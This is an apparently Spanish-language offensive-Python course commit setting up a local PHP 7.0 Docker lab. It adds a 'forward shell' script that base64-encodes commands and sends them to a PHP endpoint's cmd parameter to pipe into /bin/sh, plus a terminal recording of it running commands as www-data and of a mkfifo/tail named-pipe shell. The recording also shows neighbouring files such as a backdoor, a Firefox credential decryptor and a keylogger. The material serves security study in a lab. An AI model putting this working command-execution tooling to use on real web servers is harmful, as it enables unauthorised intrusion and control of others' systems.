diff --git a/python-ofensivo/15_hacking/12_fs/Dockerfile b/python-ofensivo/15_hacking/12_fs/Dockerfile new file mode 100644 index 0000000..9840189 --- /dev/null +++ b/python-ofensivo/15_hacking/12_fs/Dockerfile @@ -0,0 +1,5 @@ +FROM php:7.0-apache + +COPY index.php /var/www/html/ + +EXPOSE 80 diff --git a/python-ofensivo/15_hacking/12_fs/index.php b/python-ofensivo/15_hacking/12_fs/index.php new file mode 100644 index 0000000..7f2c9e7 --- /dev/null +++ b/python-ofensivo/15_hacking/12_fs/index.php @@ -0,0 +1,5 @@ + \ No newline at end of file diff --git a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py new file mode 100644 index 0000000..3c6725d --- /dev/null +++ b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python3 +""" + +Forward Shell + +Comandos para reverse shell: +https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + +mkfifo input; tail -f input | /bin/sh 2>&1 > output + +""" + +import requests +import signal +import sys + +from termcolor import colored +from base64 import b64encode + +def def_handler(sig, frame): + + print(colored("\n[!] Exiting...", "blue")) + sys.exit(1) + + +signal.signal(signal.SIGINT, def_handler) + +main_url = "http://localhost/index.php" + + +def run_command(command): + + command = b64encode(command.encode()).decode() + + data = { + 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command + } + + r = requests.get(main_url, params=data) + + return r.text + + +if __name__ == '__main__': + + while True: + + command = input(colored("> ", "yellow")) + output_command = run_command(command) + + print(output_command) diff --git a/python-ofensivo/15_hacking/12_fs/typescript b/python-ofensivo/15_hacking/12_fs/typescript new file mode 100644 index 0000000..0e9db4f --- /dev/null +++ b/python-ofensivo/15_hacking/12_fs/typescript @@ -0,0 +1,169 @@ +Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"] +  + +7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04 +❯ [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%   +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕️ main ?1  🔒 ES at ⚡ 18:20:04 +❯ [?1h=[?25h[?2004h[?25l  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:04 +❯ 🏠 192.168.1.115[?25h[?25l  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:04 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l ❯ script/[?25h +]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:09 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l ❯ #!/usr/bin/env python3[?25h +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:30 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l ❯ code forwardshell.py[?25h +]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:44 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;pywww-data + +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:23:42 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> cat + +/ +^CTraceback (most recent call last): + File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in + output_command = run_command(command) + File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command + r = requests.get(main_url, params=data) + File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get + return request("get", url, params=params, **kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request + return session.request(method=method, url=url, **kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request + resp = self.send(prep, **send_kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send + r = adapter.send(request, **kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send + resp = conn.urlopen( + File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen + httplib_response = self._make_request( + File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request + six.raise_from(e, None) + File "", line 3, in raise_from + File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request + httplib_response = conn.getresponse() + File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse + response.begin() + File "/usr/lib/python3.10/http/client.py", line 318, in begin + version, status, reason = self._read_status() + File "/usr/lib/python3.10/http/client.py", line 279, in _read_status + line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1") + File "/usr/lib/python3.10/socket.py", line 705, in readinto + return self._sock.recv_into(b) +KeyboardInterrupt + +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕️ main ?1 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> whoami +www-data + +> cat /etc/hosts +127.0.0.1 localhost +::1 localhost ip6-localhost ip6-loopback +fe00::0 ip6-localnet +ff00::0 ip6-mcastprefix +ff02::1 ip6-allnodes +ff02::2 ip6-allrouters +172.17.0.2 2f2f81768a05 + +> pwd +/var/www/html + +> ^C +[!] Exiting... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09 +❯ 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> exit + +> exit + +> ^C +[!] Exiting... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> exit + +> exit + +> ^C +[!] Exiting... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> exit + +> ls +index.php + +> e ^C +[!] Exiting... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l ❯ php --interactive[?25h +]2;php --interactive]1;phpzsh: command not found: php +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:36:56 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l ❯ docker exec -it 0fc1 sh[?25h +]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1 +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:37:09 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l ❯ d exec -it 2f2 bash[?25h +]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version +PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS ) +Copyright (c) 1997-2017 The PHP Group +Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies +root@2f2f81768a05:/var/www/html# php --interactive +Interactive shell + +php > exit +root@2f2f81768a05:/var/www/html# e exit +exit +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l ❯ mkdir concepto[?25h +]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:39:33 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l ❯ ls[?25h +]2;ls --color=tty]1;lsconcepto forwardshell.py +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:39:33 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l ❯ concepto[?25h +]2;concepto]1;concepto% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1  🔒 ES vpn at ⚡ 18:39:36 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l ❯ mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h +]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l ❯ cat output[?25h +]2;cat output]1;catv +/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto +/home/v +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1  🔒 ES vpn at ⚡ 18:48:11 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l ❯ mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h +]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no s’ha pogut crear la cua FIFO 'input': El fitxer ja existeix +/bin/sh: 5: probando: not found +^C +Session terminated, killing shell... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed. +[?25l ❯ [?25h[?2004l +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h  +🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38 +❯ 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l ❯ exit[?25h +]2;exit]1;exit +Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]